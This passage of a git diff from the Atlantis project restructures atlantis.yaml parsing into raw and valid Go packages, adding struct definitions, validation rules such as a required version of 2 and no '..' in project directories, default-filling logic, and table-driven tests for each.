+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+			r := yaml.ParserValidator{}
+			_, err = r.ReadConfig(tmpDir)
+			ErrEquals(t, c.expErr, err)
+		})
+	}
+}
+
+func TestReadConfig(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		expErr      string
+		exp         valid.Spec
+	}{
+		// Version key.
+		{
+			description: "no version",
+			input: `
+projects:
+- dir: "."
+`,
+			expErr: "version: is required.",
+		},
+		{
+			description: "unsupported version",
+			input: `
+version: 0
+projects:
+- dir: "."
+`,
+			expErr: "version: must equal 2.",
+		},
+		{
+			description: "empty version",
+			input: `
+version: ~
+projects:
+- dir: "."
+`,
+			expErr: "version: must equal 2.",
+		},
+
+		// Projects key.
+		{
+			description: "empty projects list",
+			input: `
+version: 2
+projects:`,
+			exp: valid.Spec{
+				Version:   2,
+				Projects:  nil,
+				Workflows: map[string]valid.Workflow{},
+			},
+		},
+		{
+			description: "project dir not set",
+			input: `
+version: 2
+projects:
+- `,
+			expErr: "projects: (0: (dir: cannot be blank.).).",
+		},
+		{
+			description: "project dir set",
+			input: `
+version: 2
+projects:
+- dir: .`,
+			exp: valid.Spec{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir:              ".",
+						Workspace:        "default",
+						Workflow:         nil,
+						TerraformVersion: nil,
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+						ApplyRequirements: nil,
+					},
+				},
+				Workflows: map[string]valid.Workflow{},
+			},
+		},
+		{
+			description: "project fields set except autoplan",
+			input: `
+version: 2
+projects:
+- dir: .
+  workspace: myworkspace
+  terraform_version: v0.11.0
+  apply_requirements: [approved]
+  workflow: myworkflow
+workflows:
+  myworkflow: ~`,
+			exp: valid.Spec{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir:              ".",
+						Workspace:        "myworkspace",
+						Workflow:         String("myworkflow"),
+						TerraformVersion: String("v0.11.0"),
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+						ApplyRequirements: []string{"approved"},
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {},
+				},
+			},
+		},
+		{
+			description: "project field with autoplan",
+			input: `
+version: 2
+projects:
+- dir: .
+  workspace: myworkspace
+  terraform_version: v0.11.0
+  apply_requirements: [approved]
+  workflow: myworkflow
+  autoplan:
+    enabled: false
+workflows:
+  myworkflow: ~`,
+			exp: valid.Spec{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir:              ".",
+						Workspace:        "myworkspace",
+						Workflow:         String("myworkflow"),
+						TerraformVersion: String("v0.11.0"),
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      false,
+						},
+						ApplyRequirements: []string{"approved"},
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {},
+				},
+			},
+		},
+		{
+			description: "project dir with ..",
+			input: `
+version: 2
+projects:
+- dir: ..`,
+			expErr: "projects: (0: (dir: cannot contain '..'.).).",
+		},
+
+		// Project must have dir set.
+		{
+			description: "project with no config",
+			input: `
+version: 2
+projects:
+-`,
+			expErr: "projects: (0: (dir: cannot be blank.).).",
+		},
+		{
+			description: "project with no config at index 1",
+			input: `
+version: 2
+projects:
+- dir: "."
+-`,
+			expErr: "projects: (1: (dir: cannot be blank.).).",
+		},
+		{
+			description: "project with unknown key",
+			input: `
+version: 2
+projects:
+- unknown: value`,
+			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct raw.Project",
+		},
+		{
+			description: "referencing workflow that doesn't exist",
+			input: `
+version: 2
+projects:
+- dir: .
+  workflow: undefined`,
+			expErr: "workflow \"undefined\" is not defined",
+		},
+	}
+
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+
+			r := yaml.ParserValidator{}
+			act, err := r.ReadConfig(tmpDir)
+			if c.expErr != "" {
+				ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, act)
+		})
+	}
+}
+
+func TestReadConfig_Successes(t *testing.T) {
+	basicProjects := []valid.Project{
+		{
+			Autoplan: valid.Autoplan{
+				Enabled:      true,
+				WhenModified: []string{"**/*.tf"},
+			},
+			Workspace:         "default",
+			ApplyRequirements: nil,
+			Dir:               ".",
+		},
+	}
+
+	cases := []struct {
+		description string
+		input       string
+		expOutput   valid.Spec
+	}{
+		{
+			description: "uses project defaults",
+			input: `
+version: 2
+projects:
+- dir: "."`,
+			expOutput: valid.Spec{
+				Version:   2,
+				Projects:  basicProjects,
+				Workflows: make(map[string]valid.Workflow),
+			},
+		},
+		{
+			description: "autoplan is enabled by default",
+			input: `
+version: 2
+projects:
+- dir: "."
+  autoplan:
+    when_modified: ["**/*.tf"]
+`,
+			expOutput: valid.Spec{
+				Version:   2,
+				Projects:  basicProjects,
+				Workflows: make(map[string]valid.Workflow),
+			},
+		},
+		{
+			description: "if workflows not defined there are none",
+			input: `
+version: 2
+projects:
+- dir: "."
+`,
+			expOutput: valid.Spec{
+				Version:   2,
+				Projects:  basicProjects,
+				Workflows: make(map[string]valid.Workflow),
+			},
+		},
+		{
+			description: "if workflows key set but with no workflows there are none",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows: ~
+`,
+			expOutput: valid.Spec{
+				Version:   2,
+				Projects:  basicProjects,
+				Workflows: make(map[string]valid.Workflow),
+			},
+		},
+		{
+			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+    apply:
+      steps:
+`,
+			expOutput: valid.Spec{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]valid.Workflow{
+					"default": {
+						Plan: &valid.Stage{
+							Steps: nil,
+						},
+						Apply: &valid.Stage{
+							Steps: nil,
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if steps are set then we parse them properly",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init
+      - plan
+    apply:
+      steps:
+      - plan # we don't validate if they make sense
+      - apply
+`,
+			expOutput: valid.Spec{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]valid.Workflow{
+					"default": {
+						Plan: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "init",
+								},
+								{
+									StepName: "plan",
+								},
+							},
+						},
+						Apply: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "plan",
+								},
+								{
+									StepName: "apply",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "we parse extra_args for the steps",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init:
+          extra_args: []
+      - plan:
+          extra_args:
+          - arg1
+          - arg2
+    apply:
+      steps:
+      - plan:
+          extra_args: [a, b]
+      - apply:
+          extra_args: ["a", "b"]
+`,
+			expOutput: valid.Spec{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]valid.Workflow{
+					"default": {
+						Plan: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName:  "init",
+									ExtraArgs: []string{},
+								},
+								{
+									StepName:  "plan",
+									ExtraArgs: []string{"arg1", "arg2"},
+								},
+							},
+						},
+						Apply: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName:  "plan",
+									ExtraArgs: []string{"a", "b"},
+								},
+								{
+									StepName:  "apply",
+									ExtraArgs: []string{"a", "b"},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "custom steps are parsed",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - run: "echo \"plan hi\""
+    apply:
+      steps:
+      - run: echo apply "arg 2"
+`,
+			expOutput: valid.Spec{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]valid.Workflow{
+					"default": {
+						Plan: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName:   "run",
+									RunCommand: []string{"echo", "plan hi"},
+								},
+							},
+						},
+						Apply: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName:   "run",
+									RunCommand: []string{"echo", "apply", "arg 2"},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+
+			r := yaml.ParserValidator{}
+			act, err := r.ReadConfig(tmpDir)
+			Ok(t, err)
+			Equals(t, c.expOutput, act)
+		})
+	}
+}
+
+// Bool is a helper routine that allocates a new bool value
+// to store v and returns a pointer to it.
+func Bool(v bool) *bool { return &v }
+
+// Int is a helper routine that allocates a new int value
+// to store v and returns a pointer to it.
+func Int(v int) *int { return &v }
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go
deleted file mode 100644
index d6d7e89e6d..0000000000
--- a/server/events/yaml/project.go
+++ /dev/null
@@ -1,10 +0,0 @@
-package yaml
-
-type Project struct {
-	Dir               *string   `yaml:"dir,omitempty"`
-	Workspace         *string   `yaml:"workspace,omitempty"`
-	Workflow          *string   `yaml:"workflow,omitempty"`
-	TerraformVersion  *string   `yaml:"terraform_version,omitempty"`
-	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
-	ApplyRequirements []string  `yaml:"apply_requirements,omitempty"`
-}
diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go
deleted file mode 100644
index 0827bee733..0000000000
--- a/server/events/yaml/project_test.go
+++ /dev/null
@@ -1,63 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestProject_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Project
-	}{
-		{
-			description: "omit unset fields",
-			input:       "",
-			exp: yaml.Project{
-				Dir:               nil,
-				Workspace:         nil,
-				Workflow:          nil,
-				TerraformVersion:  nil,
-				AutoPlan:          nil,
-				ApplyRequirements: nil,
-			},
-		},
-		{
-			description: "all fields set",
-			input: `
-dir: mydir
-workspace: workspace
-workflow: workflow
-terraform_version: v0.11.0
-auto_plan:
-  when_modified: []
-  enabled: false
-apply_requirements:
-- mergeable`,
-			exp: yaml.Project{
-				Dir:              String("mydir"),
-				Workspace:        String("workspace"),
-				Workflow:         String("workflow"),
-				TerraformVersion: String("v0.11.0"),
-				AutoPlan: &yaml.AutoPlan{
-					WhenModified: []string{},
-					Enabled:      Bool(false),
-				},
-				ApplyRequirements: []string{"mergeable"},
-			},
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var p yaml.Project
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &p)
-			Ok(t, err)
-			Equals(t, c.exp, p)
-		})
-	}
-}
diff --git a/server/events/yaml/raw/autoplan.go b/server/events/yaml/raw/autoplan.go
new file mode 100644
index 0000000000..00222d1631
--- /dev/null
+++ b/server/events/yaml/raw/autoplan.go
@@ -0,0 +1,39 @@
+package raw
+
+import "github.com/runatlantis/atlantis/server/events/yaml/valid"
+
+const DefaultAutoPlanWhenModified = "**/*.tf"
+const DefaultAutoPlanEnabled = true
+
+type Autoplan struct {
+	WhenModified []string `yaml:"when_modified,omitempty"`
+	Enabled      *bool    `yaml:"enabled,omitempty"`
+}
+
+func (a Autoplan) ToValid() valid.Autoplan {
+	var v valid.Autoplan
+	if a.WhenModified == nil {
+		v.WhenModified = []string{DefaultAutoPlanWhenModified}
+	} else {
+		v.WhenModified = a.WhenModified
+	}
+
+	if a.Enabled == nil {
+		v.Enabled = true
+	} else {
+		v.Enabled = *a.Enabled
+	}
+
+	return v
+}
+
+func (a Autoplan) Validate() error {
+	return nil
+}
+
+func DefaultAutoPlan() valid.Autoplan {
+	return valid.Autoplan{
+		WhenModified: []string{DefaultAutoPlanWhenModified},
+		Enabled:      DefaultAutoPlanEnabled,
+	}
+}
diff --git a/server/events/yaml/raw/autoplan_test.go b/server/events/yaml/raw/autoplan_test.go
new file mode 100644
index 0000000000..43b85a0143
--- /dev/null
+++ b/server/events/yaml/raw/autoplan_test.go
@@ -0,0 +1,151 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestAutoPlan_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Autoplan
+	}{
+		{
+			description: "omit unset fields",
+			input:       "",
+			exp: raw.Autoplan{
+				Enabled:      nil,
+				WhenModified: nil,
+			},
+		},
+		{
+			description: "all fields set",
+			input: `
+enabled: true
+when_modified: ["something-else"]
+`,
+			exp: raw.Autoplan{
+				Enabled:      Bool(true),
+				WhenModified: []string{"something-else"},
+			},
+		},
+		{
+			description: "enabled false",
+			input: `
+enabled: false
+when_modified: ["something-else"]
+`,
+			exp: raw.Autoplan{
+				Enabled:      Bool(false),
+				WhenModified: []string{"something-else"},
+			},
+		},
+		{
+			description: "modified elem empty",
+			input: `
+enabled: false
+when_modified:
+-
+`,
+			exp: raw.Autoplan{
+				Enabled:      Bool(false),
+				WhenModified: []string{""},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var a raw.Autoplan
+			err := yaml.UnmarshalStrict([]byte(c.input), &a)
+			Ok(t, err)
+			Equals(t, c.exp, a)
+		})
+	}
+}
+
+func TestAutoplan_Validate(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Autoplan
+	}{
+		{
+			description: "nothing set",
+			input:       raw.Autoplan{},
+		},
+		{
+			description: "when_modified empty",
+			input: raw.Autoplan{
+				WhenModified: []string{},
+			},
+		},
+		{
+			description: "enabled false",
+			input: raw.Autoplan{
+				Enabled: Bool(false),
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Ok(t, c.input.Validate())
+		})
+	}
+}
+
+func TestAutoplan_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Autoplan
+		exp         valid.Autoplan
+	}{
+		{
+			description: "nothing set",
+			input:       raw.Autoplan{},
+			exp: valid.Autoplan{
+				Enabled:      true,
+				WhenModified: []string{"**/*.tf"},
+			},
+		},
+		{
+			description: "when modified empty",
+			input: raw.Autoplan{
+				WhenModified: []string{},
+			},
+			exp: valid.Autoplan{
+				Enabled:      true,
+				WhenModified: []string{},
+			},
+		},
+		{
+			description: "enabled false",
+			input: raw.Autoplan{
+				Enabled: Bool(false),
+			},
+			exp: valid.Autoplan{
+				Enabled:      false,
+				WhenModified: []string{"**/*.tf"},
+			},
+		},
+		{
+			description: "enabled true",
+			input: raw.Autoplan{
+				Enabled: Bool(true),
+			},
+			exp: valid.Autoplan{
+				Enabled:      true,
+				WhenModified: []string{"**/*.tf"},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
new file mode 100644
index 0000000000..be9ce1980b
--- /dev/null
+++ b/server/events/yaml/raw/project.go
@@ -0,0 +1,70 @@
+package raw
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+	DefaultWorkspace         = "default"
+	ApprovedApplyRequirement = "approved"
+)
+
+type Project struct {
+	Dir               *string   `yaml:"dir,omitempty"`
+	Workspace         *string   `yaml:"workspace,omitempty"`
+	Workflow          *string   `yaml:"workflow,omitempty"`
+	TerraformVersion  *string   `yaml:"terraform_version,omitempty"`
+	Autoplan          *Autoplan `yaml:"autoplan,omitempty"`
+	ApplyRequirements []string  `yaml:"apply_requirements,omitempty"`
+}
+
+func (p Project) Validate() error {
+	hasDotDot := func(value interface{}) error {
+		if strings.Contains(*value.(*string), "..") {
+			return errors.New("cannot contain '..'")
+		}
+		return nil
+	}
+	validApplyReq := func(value interface{}) error {
+		reqs := value.([]string)
+		for _, r := range reqs {
+			if r != ApprovedApplyRequirement {
+				return fmt.Errorf("%q not supported, only %s is supported", r, ApprovedApplyRequirement)
+			}
+		}
+		return nil
+	}
+	return validation.ValidateStruct(&p,
+		validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)),
+		validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)),
+	)
+}
+
+func (p Project) ToValid() valid.Project {
+	var v valid.Project
+	v.Dir = *p.Dir
+
+	if p.Workspace == nil {
+		v.Workspace = DefaultWorkspace
+	} else {
+		v.Workspace = *p.Workspace
+	}
+
+	v.Workflow = p.Workflow
+	v.TerraformVersion = p.TerraformVersion
+	if p.Autoplan == nil {
+		v.Autoplan = DefaultAutoPlan()
+	} else {
+		v.Autoplan = p.Autoplan.ToValid()
+	}
+
+	// There are no default apply requirements.
+	v.ApplyRequirements = p.ApplyRequirements
+
+	return v
+}
diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go
new file mode 100644
index 0000000000..9c06914896
--- /dev/null
+++ b/server/events/yaml/raw/project_test.go
@@ -0,0 +1,178 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestProject_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Project
+	}{
+		{
+			description: "omit unset fields",
+			input:       "",
+			exp: raw.Project{
+				Dir:               nil,
+				Workspace:         nil,
+				Workflow:          nil,
+				TerraformVersion:  nil,
+				Autoplan:          nil,
+				ApplyRequirements: nil,
+			},
+		},
+		{
+			description: "all fields set",
+			input: `
+dir: mydir
+workspace: workspace
+workflow: workflow
+terraform_version: v0.11.0
+autoplan:
+  when_modified: []
+  enabled: false
+apply_requirements:
+- mergeable`,
+			exp: raw.Project{
+				Dir:              String("mydir"),
+				Workspace:        String("workspace"),
+				Workflow:         String("workflow"),
+				TerraformVersion: String("v0.11.0"),
+				Autoplan: &raw.Autoplan{
+					WhenModified: []string{},
+					Enabled:      Bool(false),
+				},
+				ApplyRequirements: []string{"mergeable"},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var p raw.Project
+			err := yaml.UnmarshalStrict([]byte(c.input), &p)
+			Ok(t, err)
+			Equals(t, c.exp, p)
+		})
+	}
+}
+
+func TestProject_Validate(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Project
+		expErr      string
+	}{
+		{
+			description: "minimal fields",
+			input: raw.Project{
+				Dir: String("."),
+			},
+			expErr: "",
+		},
+		{
+			description: "dir empty",
+			input: raw.Project{
+				Dir: nil,
+			},
+			expErr: "dir: cannot be blank.",
+		},
+		{
+			description: "dir with ..",
+			input: raw.Project{
+				Dir: String("../mydir"),
+			},
+			expErr: "dir: cannot contain '..'.",
+		},
+		{
+			description: "apply reqs with unsupported",
+			input: raw.Project{
+				Dir:               String("."),
+				ApplyRequirements: []string{"unsupported"},
+			},
+			expErr: "apply_requirements: \"unsupported\" not supported, only approved is supported.",
+		},
+		{
+			description: "apply reqs with valid",
+			input: raw.Project{
+				Dir:               String("."),
+				ApplyRequirements: []string{"approved"},
+			},
+			expErr: "",
+		},
+	}
+	validation.ErrorTag = "yaml"
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := c.input.Validate()
+			if c.expErr == "" {
+				Ok(t, err)
+			} else {
+				ErrEquals(t, c.expErr, err)
+			}
+		})
+	}
+}
+
+func TestProject_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Project
+		exp         valid.Project
+	}{
+		{
+			description: "minimal values",
+			input: raw.Project{
+				Dir: String("."),
+			},
+			exp: valid.Project{
+				Dir:              ".",
+				Workspace:        "default",
+				Workflow:         nil,
+				TerraformVersion: nil,
+				Autoplan: valid.Autoplan{
+					WhenModified: []string{"**/*.tf"},
+					Enabled:      true,
+				},
+				ApplyRequirements: nil,
+			},
+		},
+		{
+			description: "all set",
+			input: raw.Project{
+				Dir:              String("."),
+				Workspace:        String("myworkspace"),
+				Workflow:         String("myworkflow"),
+				TerraformVersion: String("v0.11.0"),
+				Autoplan: &raw.Autoplan{
+					WhenModified: []string{"hi"},
+					Enabled:      Bool(false),
+				},
+				ApplyRequirements: []string{"approved"},
+			},
+			exp: valid.Project{
+				Dir:              ".",
+				Workspace:        "myworkspace",
+				Workflow:         String("myworkflow"),
+				TerraformVersion: String("v0.11.0"),
+				Autoplan: valid.Autoplan{
+					WhenModified: []string{"hi"},
+					Enabled:      false,
+				},
+				ApplyRequirements: []string{"approved"},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go
new file mode 100644
index 0000000000..0d93ef71c4
--- /dev/null
+++ b/server/events/yaml/raw/raw.go
@@ -0,0 +1,4 @@
+// Package raw contains the golang representations of the YAML elements
+// supported in atlantis.yaml. It is called raw because no validation has
+// been done yet at this stage.
+package raw
diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/raw/raw_test.go
similarity index 95%
rename from server/events/yaml/yaml_test.go
rename to server/events/yaml/raw/raw_test.go
index c82dd3486b..e0f43fac6d 100644
--- a/server/events/yaml/yaml_test.go
+++ b/server/events/yaml/raw/raw_test.go
@@ -1,4 +1,4 @@
-package yaml_test
+package raw_test
 
 // Bool is a helper routine that allocates a new bool value
 // to store v and returns a pointer to it.
diff --git a/server/events/yaml/raw/spec.go b/server/events/yaml/raw/spec.go
new file mode 100644
index 0000000000..aaebc05f33
--- /dev/null
+++ b/server/events/yaml/raw/spec.go
@@ -0,0 +1,45 @@
+package raw
+
+import (
+	"errors"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type Spec struct {
+	Version   *int                `yaml:"version,omitempty"`
+	Projects  []Project           `yaml:"projects,omitempty"`
+	Workflows map[string]Workflow `yaml:"workflows,omitempty"`
+}
+
+func (s Spec) Validate() error {
+	equals2 := func(value interface{}) error {
+		if *value.(*int) != 2 {
+			return errors.New("must equal 2")
+		}
+		return nil
+	}
+	return validation.ValidateStruct(&s,
+		validation.Field(&s.Version, validation.NotNil, validation.By(equals2)),
+		validation.Field(&s.Projects),
+		validation.Field(&s.Workflows),
+	)
+}
+
+func (s Spec) ToValid() valid.Spec {
+	var validProjects []valid.Project
+	for _, p := range s.Projects {
+		validProjects = append(validProjects, p.ToValid())
+	}
+
+	validWorkflows := make(map[string]valid.Workflow)
+	for k, v := range s.Workflows {
+		validWorkflows[k] = v.ToValid()
+	}
+	return valid.Spec{
+		Version:   *s.Version,
+		Projects:  validProjects,
+		Workflows: validWorkflows,
+	}
+}
diff --git a/server/events/yaml/raw/spec_test.go b/server/events/yaml/raw/spec_test.go
new file mode 100644
index 0000000000..d7b83e53de
--- /dev/null
+++ b/server/events/yaml/raw/spec_test.go
@@ -0,0 +1,268 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestSpec_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Spec
+		expErr      string
+	}{
+		{
+			description: "no data",
+			input:       "",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "yaml nil",
+			input:       "~",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "invalid key",
+			input:       "invalid: key",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 1: field invalid not found in struct raw.Spec",
+		},
+		{
+			description: "version set",
+			input:       "version: 2",
+			exp: raw.Spec{
+				Version:   Int(2),
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "projects key without value",
+			input:       "projects:",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "workflows key without value",
+			input:       "workflows:",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "projects with a map",
+			input:       "projects:\n  key: value",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 2: cannot unmarshal !!map into []raw.Project",
+		},
+		{
+			description: "projects with a scalar",
+			input:       "projects: value",
+			exp: raw.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `value` into []raw.Project",
+		},
+		{
+			description: "should use values if set",
+			input: `
+version: 2
+projects:
+- dir: mydir
+  workspace: myworkspace
+  workflow: default
+  terraform_version: v0.11.0
+  autoplan:
+    enabled: false
+    when_modified: []
+  apply_requirements: [mergeable]
+workflows:
+  default:
+    plan:
+      steps: []
+    apply:
+     steps: []`,
+			exp: raw.Spec{
+				Version: Int(2),
+				Projects: []raw.Project{
+					{
+						Dir:              String("mydir"),
+						Workspace:        String("myworkspace"),
+						Workflow:         String("default"),
+						TerraformVersion: String("v0.11.0"),
+						Autoplan: &raw.Autoplan{
+							WhenModified: []string{},
+							Enabled:      Bool(false),
+						},
+						ApplyRequirements: []string{"mergeable"},
+					},
+				},
+				Workflows: map[string]raw.Workflow{
+					"default": {
+						Apply: &raw.Stage{
+							Steps: []raw.Step{},
+						},
+						Plan: &raw.Stage{
+							Steps: []raw.Step{},
+						},
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var conf raw.Spec
+			err := yaml.UnmarshalStrict([]byte(c.input), &conf)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, conf)
+		})
+	}
+}
+
+func TestSpec_Validate(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Spec
+		expErr      string
+	}{}
+	validation.ErrorTag = "yaml"
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := c.input.Validate()
+			if c.expErr == "" {
+				Ok(t, err)
+			} else {
+				ErrEquals(t, c.expErr, err)
+			}
+		})
+	}
+}
+
+func TestSpec_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Spec
+		exp         valid.Spec
+	}{
+		{
+			description: "nothing set",
+			input:       raw.Spec{Version: Int(2)},
+			exp: valid.Spec{
+				Version:   2,
+				Workflows: make(map[string]valid.Workflow),
+			},
+		},
+		{
+			description: "set to empty",
+			input: raw.Spec{
+				Version:   Int(2),
+				Workflows: map[string]raw.Workflow{},
+				Projects:  []raw.Project{},
+			},
+			exp: valid.Spec{
+				Version:   2,
+				Workflows: map[string]valid.Workflow{},
+				Projects:  nil,
+			},
+		},
+		{
+			description: "everything set",
+			input: raw.Spec{
+				Version: Int(2),
+				Workflows: map[string]raw.Workflow{
+					"myworkflow": {
+						Apply: &raw.Stage{
+							Steps: []raw.Step{
+								{
+									Key: String("apply"),
+								},
+							},
+						},
+						Plan: &raw.Stage{
+							Steps: []raw.Step{
+								{
+									Key: String("init"),
+								},
+							},
+						},
+					},
+				},
+				Projects: []raw.Project{
+					{
+						Dir: String("mydir"),
+					},
+				},
+			},
+			exp: valid.Spec{
+				Version: 2,
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {
+						Apply: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "apply",
+								},
+							},
+						},
+						Plan: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "init",
+								},
+							},
+						},
+					},
+				},
+				Projects: []valid.Project{
+					{
+						Dir:       "mydir",
+						Workspace: "default",
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
diff --git a/server/events/yaml/raw/stage.go b/server/events/yaml/raw/stage.go
new file mode 100644
index 0000000000..67eef1d3be
